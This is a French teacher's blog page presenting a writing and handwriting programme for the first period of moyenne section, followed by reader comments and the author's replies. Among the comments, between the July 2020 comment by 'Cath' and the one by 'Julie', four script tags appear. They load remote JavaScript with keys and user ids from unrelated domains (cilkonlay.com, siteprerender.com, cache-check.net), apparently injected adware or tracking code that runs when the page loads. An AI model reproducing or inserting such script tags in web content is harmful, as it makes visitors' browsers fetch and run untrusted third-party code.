-
Prog Domaine de l'écrit MS P1
Pour réaliser cette programmation du domaine de l'écrit, j'ai tenté de combiner plusieurs ouvrages : Vers l'écriture de chez Accès, les cahiers d'écriture Maternelle de la méthode Dumont, "ma méthode d'écriture Danièle Dumont" ainsi que l'ouvrage d'Accès Graphic'art.
Petit changement au niveau du "design", en lien avec la mascotte de ma classe : Hibouline.
Vous pouvez retrouver ici ma séquence sur les lignes GARDONS LA LIGNE --> CLIC
Vous pouvez retrouver ma programmation pour la partie du geste graphique ICI
Pour en savoir plus sur le geste d'écriture et la mise en place de mon cahier en MS, c'est par ici :) CLIC
-
Commentaires
45sosoMercredi 29 Décembre 2021 à 18:56merci pour la réouverture du blog et merci pour le partage de ces docs44AlisonJeudi 26 Août 2021 à 12:34Bonjour,
Un grand merci pour votre travail qui permet à mes élèves et à moi-même de progresser !
Comptez-vous publier les périodes 4 et 5 ? Cela me serait d'une grande aide.
En vous souhaitant une bonne reprise .
Respectueusement,
Alison
-
Jeudi 26 Août 2021 à 12:39
-
43Loup MSDimanche 4 Juillet 2021 à 19:07Bonjour,
Je vous remercie pour l'ensemble de vos partages.
Je voulais savoir si vous pensiez mettre en ligne les progressions P4 et P5.
Je sais que vous n'aurez plus de MS l'an prochain donc je comprendrai que vous ne mettiez pas ces documents mais au cas où :-)
42orelylouJeudi 8 Avril 2021 à 15:55Bonjour,
Je me suis appuyée sur vos 3 premières périodes pour le tableau avec les compétences.
Avez-vous prévu de publier les P4 et P5? Cela m'aide beaucoup car je débute en maternelle.
Merci par avance.
Cordialement.
Aurélie
41coumaraneJeudi 7 Janvier 2021 à 20:0340France-LiseMardi 27 Octobre 2020 à 19:41De retour en maternelle après plusieurs années, tous ces outils sont d'un très grand secours pour remettre le pied à l'étrier ! Merci merci et merci !
39CAROBVendredi 28 Août 2020 à 08:55Bonjour
Je suis désolée mais je n'arrive pas à trouver la période 4 et 5.
Peut être sont elles bien cachées ou peut être que vous n'avez pas eu le temps de les faire...
Pourriez vous m'indiquer si je peux les trouver quelque part?
Merci d'avance!
-
Vendredi 28 Août 2020 à 09:18
-
38AmélieMercredi 26 Août 2020 à 15:45Bonjour,
Merci beaucoup pur ce travail de qualité qui m'a éclaircie Dumont et m'a replongée dans le livre.
En P1 pour les MS, vous n'utilisez pas les fiches du cahier Dumont ? J'aimerais bien savoir comment vous répartissez les fiches du cahier dans une progressivité à l'année.
Avez vous la partie latéralité sur fiches ?
Je voulais travailler sur les mains, la reconnaissance des doigts avec les comptines, reconnaître sa main droite avec les jeux du cartable magique et le personnage disparaît
Pour la tenue du crayon, jeux de doigts, comptine pour connaître le nom des doigts, l'ombre du lapin, la peinture à doigts et le ping pong des bouchons.
Pour la gestion de l'espace, je suis partie sur de la manipulation d'objets avec en fin de période la fiche des trains et des bonshommes.
Qu'en pensez-vous ?
37kiwiMardi 25 Août 2020 à 09:01Bonjour,
après lecture de votre article, je me demandais si il y avait une trace dans le cahier des MS pour la première période (des activités Dumont)?
Merci par avance.
-
Mardi 25 Août 2020 à 09:32
-
36FLJeudi 20 Août 2020 à 20:34Mille mercis pour vos partages ! De retour en maternelle après plusieurs années au cycle 3, je suis enchantée de découvrir ces excellents documents qui m'aideront à créer les miens. Bonne rentrée à tous !
35MaiderMardi 4 Août 2020 à 11:12Merci pour ce formidable travail et tout ce partage. Après avoir lu beaucoup d'avis positifs sur la méthode Dumont (notamment sur votre blog), j'ai commandé son ouvrage que je suis en train de potasser. Tous vos documents sont d'une grande aide pour me familiariser plus facilement avec cette méthode.
34ValLundi 3 Août 2020 à 16:54bonjour Lucie,
Je voulais te féliciter et te remercier pour les activités que tu nous proposes. Vieille prof pourtant et actuellement en PS/MS, je suis une grande fan de tout ce que tu présentes et j'attends avec impatience "200 ateliers autonomes pour les PS". J'ai acheté celui des MS que je vais mettre en place cette année puis retirer mes vieux "tiroirs d'autonomies".
Je voulais juste savoir où tu as caché tes petits dessins (canard, escargots, voiture, ballons,etc) pour réaliser les consignes des gestes graphiques du cahier d'écriture des MS. je ne les trouve pas sur ton merveilleux site...
Merci beaucoup et BRAVO encore!
-
Lundi 3 Août 2020 à 17:07
-
33CathJeudi 9 Juillet 2020 à 17:23Bonjour,
tout d'abord un immense merci pour tout votre travail, et surtout merci de le partager!!!!!!
j'avais une question concernant le temps (emploi du temps MS/GS de 2019/20) avec les MS intitulé JEUX DE LETTRES. Que travaillez-vous? les correspondances entre les 3 écritures? je ne l'ai pas vu apparaître dans les progressions, c'est pour cela que je me permets de vous demander quelques précisions......
bon début de vacances, même si elles sont toujours un peu studieuses
merci pour votre réponse
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script> <script src="http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script> <script src="http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1594307916833" type="text/javascript"></script> <script src="http://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>32JulieMercredi 29 Janvier 2020 à 09:20Bonjour !
Un grand merci Luccia pour tout ton travail et le partage que tu en fais !!
Je n'arrive pas à trouver la Programmation de l'écrit ( graphisme/écriture ) en Moyenne section pour la période 2 de l'année 2019-2020. Et je cherche aussi celle de la période 4 de l'année précédente. Je ne dois pas savoir chercher...
Pourrais-tu m'aider s'il te plaît ?
Un grand merci par avance !
Bon mercredi !
Julie
31WendydupaysimaginairVendredi 30 Août 2019 à 22:05Bonjour. Déjà un immense merci pour ce blog magnifique et ce partage. J'ai une question concernant les termes Programmations et Progressions parce qu’honnêtement, je ne comprends pas trop la subtilité. Qq fois tu parles de tes prog (progressions) et sur ton doc il est écrit programmation (par exemple pour moi ton premier document est une programmation pour la période 1 et ton second document est une progression qui détaille cette programmation semaine par semaine). Je m'y perds un peu dans ces termes. Et pas certaine d'avoir bien compris en fait.
-
WendydupaysimaginairSamedi 31 Août 2019 à 13:44
MERCI
-
Vendredi 30 Août 2019 à 22:16
-
30pmoldoMercredi 14 Août 2019 à 09:0529VéroniqueMercredi 7 Août 2019 à 16:51Première fois en maternelle, en MS GS à la rentrée ! Quel bonheur de lire ton site ! Quel travail ...et quelle générosité ! Merci merci :)
28coralieSamedi 3 Août 2019 à 10:08bonjour Lucia
Toujours aussi admirative de ton travail, je ne me lasse pas de te lire et relire. Une question concernant les activités "je regarde le ciel" ou "les mouches", ce sont des observations individuelles donc comment les gères-tu dans la classe ? que font tes autres MS pendant ce temps ? merci pour ta réponse et bonnes vacances
-
coralieMercredi 14 Août 2019 à 09:37
merci pour ta réponse
-
Samedi 3 Août 2019 à 11:16
-
27JujuJeudi 11 Juillet 2019 à 11:22Bonjour Luccia,
Tout d'abord un grand grand merci pour tout ce travail qui m'a bien aidée déjà cette année ( PS/GS pour la 1ère fois) ! J'aimerais avoir 2 petits renseignements : à quoi correspondent les activités " je regarde le ciel la nuit" " je joue aux mouches…" … "le ping pong des bouchons" ?
Et comment intègres-tu ta programmation Graphisme dans ta programmation " Ecrit" ? je ne retrouve pas les activités de la 1ères dans la seconde. Sauf si les activités manuelles de chaque séquence correspondent aux activités de Vers l'Ecriture.
Un grand merci pour tes réponses ! je te souhaite de belles vacances !
Juju
-
Jeudi 11 Juillet 2019 à 11:56
Bonjour,
Les activités, ciel et ping pong sont issues du livre de Danièle Dumont.
Les activités manuelles correspondent bien aux activités de Vers l'écriture : la partie J'expérimente et j'observe correspond à ce que je fais en atelier dirigé avec mes MS une fois par semaine. La partie Je trace est faite avec mon Asem le matin après la récré.
-
26Snoopy2081Vendredi 16 Novembre 2018 à 15:13Bonjour,
Un grand merci pour les documents partagés. C'est très bien structuré et ça me permet de me donner une base pour faire les miens. A bientôt !
25LudySamedi 25 Août 2018 à 10:1124LudySamedi 25 Août 2018 à 09:3123ZabouVendredi 24 Août 2018 à 16:45merci beaucoup pour tout ce partage!!! Superbe travail!!!! Chapeau bas!!!!
-
Vendredi 24 Août 2018 à 17:16
-
ZabouVendredi 24 Août 2018 à 16:47
oups.... j'ai cru que le 1er n'était pas passé!!!!
-
22ZabouVendredi 24 Août 2018 à 16:4521SaraJeudi 9 Août 2018 à 18:1620MariedoMercredi 25 Juillet 2018 à 09:52Bonjour
Merci pour ton travail.
Je me pose une question: pour les MS, je vois que tu introduis très tôt le rond et pas la boucle.
Tu ne suis pas la méthode Dumont pour les MS?
Merci
-
Mercredi 25 Juillet 2018 à 10:04
Si si, mais pour ce qui est de la méthode Dumont, je reprends au 1er cahier : la latéralité, la tenue du crayon et la gestion statique de l'espace. Du coup, je ne suis pas encore parvenue à la gestion dynamique de l'espace où là, j'introduirai la boucle. Je préfère dissocier le travail sur le graphisme décoratif (ligne, cercle ...) et faire de la boucle un vrai outil pour l'apprentissage du geste d'écriture :)
-
19krisMardi 17 Juillet 2018 à 14:4318mariecMardi 17 Juillet 2018 à 10:58Super merci cela m'aide
Je pense acheter le geste d'écriture
Par contre une question , vous apprenez l 'écriture de toutes ces lettres droites en même temps et pas lettre par lettre . Cela ne fait il pas trop d'un coup?
Merci par avance
-
mariecVendredi 20 Juillet 2018 à 13:23
Merci pour la réponse claire je me lance j'ai acheté le livre MS
-
Mardi 17 Juillet 2018 à 21:30
Non. L'apprentissage des lettres capitales ne doit d'ailleurs pas se faire lettre par lettre. Très vite, les élèves savent faire un L ou un T, un E ou un F, pas besoin de passer 2 jours sur chaque lettre; ça serait freiner ceux qui sont capables d'aller plus vite. Et ceux qui ont plus de difficulté, c'est que le geste de la ligne horizontale et verticale n'est pas maitrisé et qu'il faut repartir sur les fondamentaux.
-
Ajouter un commentaire
Merci!!! je connais ton livre pour les ateliers autonomes, il cartonne dans ma classe, je n'étais jamais allé fouiner dans ton blog, quelle richesse, merci pour ce partage.